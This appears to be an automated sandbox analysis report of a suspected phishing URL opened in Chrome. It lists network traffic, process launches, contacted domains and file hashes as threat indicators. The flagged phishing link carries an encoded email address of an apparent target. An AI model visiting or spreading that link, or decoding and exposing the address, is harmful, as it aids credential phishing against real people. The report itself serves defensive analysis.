Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60710
Source: unknown	Network traffic detected: HTTP traffic on port 60737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60728
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60722
Source: unknown	Network traffic detected: HTTP traffic on port 60751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60693
Source: unknown	Network traffic detected: HTTP traffic on port 60674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60690
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60699
Source: unknown	Network traffic detected: HTTP traffic on port 60739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60667 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60755 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:60695 version: TLS 1.2

Source: classification engine

Classification label: mal56.phis.win@33/87@42/13

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1912,i,16068563968825472916,3596448657120280813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1912,i,16068563968825472916,3596448657120280813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.193.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
104.18.94.41	unknown	United States	13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.16.124.96	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.184.196	www.google.com	United States	15169	GOOGLEUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	pupsarebestde.ru	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	onlinepdf-qrsharedfile.com	European Union	13335	CLOUDFLARENETUS	false
104.17.25.14	unknown	United States	13335	CLOUDFLARENETUS	false
104.16.123.96	www.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

Contacted Domains

Name	IP	Active
jsdelivr.map.fastly.net	151.101.193.229	true
a.nel.cloudflare.com	35.190.80.1	true
www.cloudflare.com	104.16.123.96	true
pupsarebestde.ru	188.114.97.3	true
cdnjs.cloudflare.com	104.17.24.14	true
challenges.cloudflare.com	104.18.95.41	true
onlinepdf-qrsharedfile.com	188.114.96.3	true
www.google.com	142.250.184.196	true
cdn.jsdelivr.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://a.nel.cloudflare.com/report/v4?s=hyM83nmS74ZBrZZx0zMqGq0nhEtuJk3Rl2s0dCYSbpmF1fTcRS0wOf5jZ7W14Vn8UBaUl5adocxkA9C1YOQs1sLlffA7yOtQeTWSiPGn09qDoY%2BUzEtzSBZ1q%2BfgSD8auitnLl1rgANIbIbAIA%3D%3D	false		unknown
https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	true		unknown
https://a.nel.cloudflare.com/report/v4?s=Hf3vCbrz5WvO%2BMOq%2B0HEWZY%2BySsqLAS2mCvwDsbWYKu1j%2BAczvpVWR%2BUp4HUaSzTT3LIyH4yHDJo2GqNCj7vqE5ObQRJ6DBxglozimEehzcO3r9Wj2VNKqq6ACsSU5BbPazw9IWiLDbSi%2BY%2Fuw%3D%3D	false		unknown
https://pupsarebestde.ru/favicon.ico	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/	false		unknown
https://pupsarebestde.ru//	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1925323196:1729797399:g37pL3I2Fo2Vok7htRJ4WdBDXWx02YngmwxM-TxMTqQ/8d7c76e74f17e7bb/VxrfLBVyqotNu1TZiTOF78m36xVsFK8lt5MsZShVoR8-1729799097-1.1.1.1-o_G2kEpeuA9iEfyTttTXLAh1gKhx8u0tLdGPg3DkkHOjXczfIs15_0NUghOMk2k9	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c76e74f17e7bb&lang=auto	false		unknown
https://onlinepdf-qrsharedfile.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d7c74e579c6dd24	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c750558594780&lang=auto	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c756beb5be9b5&lang=auto	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/	false		unknown
https://challenges.cloudflare.com/turnstile/v0/b/e1a56f38220d/api.js	false		unknown
https://pupsarebestde.ru//#contact	false		unknown
https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8	false		unknown
https://challenges.cloudflare.com/turnstile/v0/api.js	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8d7c750558594780/1729799023150/bf4b2f55be509a179579ea17499ecec8026fc8792968ffabc07a1d921c7600dc/AQtoEVWkediKV3l	false		unknown
https://pupsarebestde.ru/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js	false		unknown
https://onlinepdf-qrsharedfile.com/favicon.ico	false		unknown
https://a.nel.cloudflare.com/report/v4?s=gfkWb1VtHl9LVdI8YYxxW7VP3CdS8yHUaaZcSak8lY9XJrqpi70Ba2rNT2onygdb%2FjvYO7poO%2FwbPVwYvEXQyl9vBqm2plgYtAjiWR2G%2FfS6hrs8JmpoXnG%2FtGTP4slyZ8wUuVVbD%2FhvQyFFoA%3D%3D	false		unknown
https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	false		unknown
https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d7c756beb5be9b5/1729799042860/HSbT51zwkv1XM2A	false		unknown
https://onlinepdf-qrsharedfile.com/index.html	false		unknown
https://onlinepdf-qrsharedfile.com/index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8d7c76e74f17e7bb/1729799100474/e8cc6bfcd974cb047485d94945af125403ea0eba4a6173fefbc168b3d4ab3c67/FSUmaMzuw_psFoU	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d7c76e74f17e7bb/1729799100472/AvNCA72nHZRr_kB	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8d7c756beb5be9b5/1729799042855/9eaf4d3495c5ba95711fc1f736e283be717bddf8fe5bba7780b88bd4e011e1ce/5oS3Z1UwhtQluM6	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d7c750558594780/1729799023153/FLgUDq43Jq_StjH	false		unknown
https://www.cloudflare.com/favicon.ico	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1577562326:1729797168:4XUW6U4ilMXE9tFlofjzWIs8fkQ_XTKzF2Tj7VZjhQo/8d7c756beb5be9b5/riMy10U7XDeNcLr_S3lB2nLaXd2_wh8RtSeVIqQ2rYs-1729799036-1.1.1.1-xOf4FlGN6vxQckdYn.7ovk0KR1nOWvb5myyhnCNUQeQn5OKLXN9FXUawXjqbwzh.	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	false	URL Reputation: safe	unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:43:34 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	CE8DBA2EB4D0EC64362F42668788EDEF	CE98A822D6D7B2FA4F6E0C2A60134B6A0ABB1FE6	942370D5ACCB145D5E2769110CF89FA6B577D228B6C58993B94802853107764D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:43:34 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	D0169FCD13D0213D6048F532B29C5502	AFBE638FA50665F89A46D802D053158BAC7368AF	3A40778CFCCD06D4E86D899B713BA7FA6D7F904BDE31596F6DF79884AB2D4E44
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	1B16580DBBA9AE2DD8A42B1A5F61F813	6166747DB31F78347FF87FAF3AA89FB2E5796425	E03356B6BCC955E570856B5478938260211BBDCDF527E001B0CE301CA0A08DED
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:43:34 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	A7343D69EA0854EA70A9B338A973D62B	1A138FFBDC67B015F7D19AC31BB72564577CAD49	DA81417FDDEC660D94A43027F50A0AC7406BB1A302C844A05A9BFDA2E9F2B3F5
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:43:34 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	82F42AD28DC689C7ACD368A405229721	D036818E431D0FE951A0486EACE6B321577E68A6	4466749493261F885D10CED89E30815A5E1E442EC6A5A6E676145BD9BD6B6675
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:43:34 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide	FF09C2739E8AF23B3D0085F9348F6CCD	2E14404DAC2C1EE4790EA4623EEF7811EEE0DB69	6B879B83E9A22CF98EA36325E24005049A0F4FB0D5A502BDB4D1511BD8FDB3AB
Chrome Cache Entry: 158	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x315, components 3	B56D35E6C0340B677D561CF90C4EC3D4	9964E69E0199F772B19DDA8048B2F637C5E6D6BD	CF2E0A23D0C92F56500951D9BADEDF8A5F9E3E31D9F02CE6A046F9D88DC797E5
Chrome Cache Entry: 159	HTML document, ASCII text, with very long lines (1238)	9E8F56E8E1806253BA01A95CFC3D392C	A8AF90D7482E1E99D03DE6BF88FED2315C5DD728	2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
Chrome Cache Entry: 160	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3	40191566C60631C08C3F2B487EB2D0A3	C27414542DF9F6B597B07F5A27E10C90E28D0517	785728D3F6DDE045F41AC93845C4D39567509AB10133BD4B4E570ECFAE76F035
Chrome Cache Entry: 161	HTML document, ASCII text, with very long lines (1238)	9E8F56E8E1806253BA01A95CFC3D392C	A8AF90D7482E1E99D03DE6BF88FED2315C5DD728	2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
Chrome Cache Entry: 162	ASCII text, with very long lines (65299)	2E477967E482F32E65D4EA9B2FD8E106	DDC6E9EAD6D16AE9237399CE41E8C1620CC59C36	0833B2E9C3A26C258476C46266E6877FC75218625162E0460BE9A3A098A61C6C
Chrome Cache Entry: 163	ASCII text, with very long lines (47671)	EC4B20037C896C5F60640105C6EA36B1	A9A74169679305B6EF1B76470F5CB746D9420213	FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
Chrome Cache Entry: 164	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced	9246CCA8FC3C00F50035F28E9F6B7F7D	3AA538440F70873B574F40CD793060F53EC17A5D	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
Chrome Cache Entry: 165	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3	40191566C60631C08C3F2B487EB2D0A3	C27414542DF9F6B597B07F5A27E10C90E28D0517	785728D3F6DDE045F41AC93845C4D39567509AB10133BD4B4E570ECFAE76F035
Chrome Cache Entry: 166	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x296, components 3	723F518C995D53B262E99E8E3EFB4A5A	FBC0E39A100ED2496493023E68A0AF5D1B432320	0AF145F7825BF3FDACDCF6DE3978D971C4C0A6F07C6C01AE1064D7E9AA1D299F
Chrome Cache Entry: 167	PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced	112AD5F84433E5F46D607F73FB64BD60	A8BF11F3F6099CA49D1CBF73C050EB7E6FBC68B4	0F84307AD691800E391FCCB42B4BA290A87FEBF001ABEDFBE03B34767D45E441
Chrome Cache Entry: 168	PNG image data, 44 x 39, 8-bit/color RGB, non-interlaced	30B0EFC270DED2E5F14DA2410E2A279E	3B6CB3B701A4DABEC6DC8351E2B81B19B7EF2317	A332A201300A259B31F688FC9B5C881522446A40691FA17C6CC5E996A19F8A0C
Chrome Cache Entry: 169	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x355, components 3	68E3D35617E577F900BB6DF9244EAD95	442E858B1FF330F1CF45947F360EFD3D5AF8EEF9	964A0E03C6993374109110CBE8C7BBC29BEC2EBE2885462F912BFBFBB8705795
Chrome Cache Entry: 170	ASCII text, with very long lines (65299)	2E477967E482F32E65D4EA9B2FD8E106	DDC6E9EAD6D16AE9237399CE41E8C1620CC59C36	0833B2E9C3A26C258476C46266E6877FC75218625162E0460BE9A3A098A61C6C
Chrome Cache Entry: 171	HTML document, Unicode text, UTF-8 text, with very long lines (3407), with CRLF, LF line terminators	8397D89351D7144D012A5B34224B0D0C	9218CCDA63AA7FA0988C40A1EAB92EF0AAFF7B38	3F47B802D2815754255964437EEF844BFB53EAD4B5895709489EF9EDF560E5C5
Chrome Cache Entry: 172	Unicode text, UTF-8 text, with very long lines (65342)	A549AF2A81CD9900EE897D8BC9C4B5E9	C5AC1DEE961CB59A045256EC203F69E317872F7C	3C8F27E6009CCFD710A905E6DCF12D0EE3C6F2AC7DA05B0572D3E0D12E736FC8
Chrome Cache Entry: 173	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x316, components 3	5BD102B7AB3A62B9117207034C875F39	C01AC151DEC1BF81323246DF54AFF31449B2CC5A	123C5816BF4127F4E6C74C35C426AA3EBEB0B5422D4D86840578642A8E07AD35
Chrome Cache Entry: 174	ASCII text, with very long lines (47671)	EC4B20037C896C5F60640105C6EA36B1	A9A74169679305B6EF1B76470F5CB746D9420213	FBACCE424D00878284DB8C04089F007944324D9CD2432DB2472E4CF62A39DBBF
Chrome Cache Entry: 175	PNG image data, 83 x 34, 8-bit/color RGB, non-interlaced	4C7103858A8323A6EB0EF885235229EE	3838B2AE297A0E246E5F197C93339A342CD91B55	48175F389B9203CE2139074E313EDDC6DE5F0ECD24025B70488884D897681735
Chrome Cache Entry: 176	HTML document, ASCII text, with very long lines (522), with CRLF line terminators	59694DDC54400F2956FC0206ACD6DFD7	FFCA73FB015AE0D792610F4B2A06514AA6932605	A5928182476BC42146ABA5225F339EE85F9575BD066208AC87706F6F08DCBE64
Chrome Cache Entry: 177	PNG image data, 3 x 54, 8-bit/color RGB, non-interlaced	C43FBE9BB1AA882C56B0D80F693D65CA	FC14BB3551AAF768A49F684D51E3D3464B587AE5	93F27A78DC1127E02E219F5C458E223711825A6DD2B8BBDD6228B7A56856BEB4
Chrome Cache Entry: 178	PNG image data, 3 x 54, 8-bit/color RGB, non-interlaced	C43FBE9BB1AA882C56B0D80F693D65CA	FC14BB3551AAF768A49F684D51E3D3464B587AE5	93F27A78DC1127E02E219F5C458E223711825A6DD2B8BBDD6228B7A56856BEB4
Chrome Cache Entry: 179	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 474x266, components 3	27468C38116C94B229FFD3BEABE5A199	78EA9027A989BEB96D274F30733F82351F122E53	2BA6280E3B467708707A4B4AC3771F9E4B5BDAAF6152289FED7377D1C743E28E
Chrome Cache Entry: 180	ASCII text, with very long lines (65299)	2E477967E482F32E65D4EA9B2FD8E106	DDC6E9EAD6D16AE9237399CE41E8C1620CC59C36	0833B2E9C3A26C258476C46266E6877FC75218625162E0460BE9A3A098A61C6C
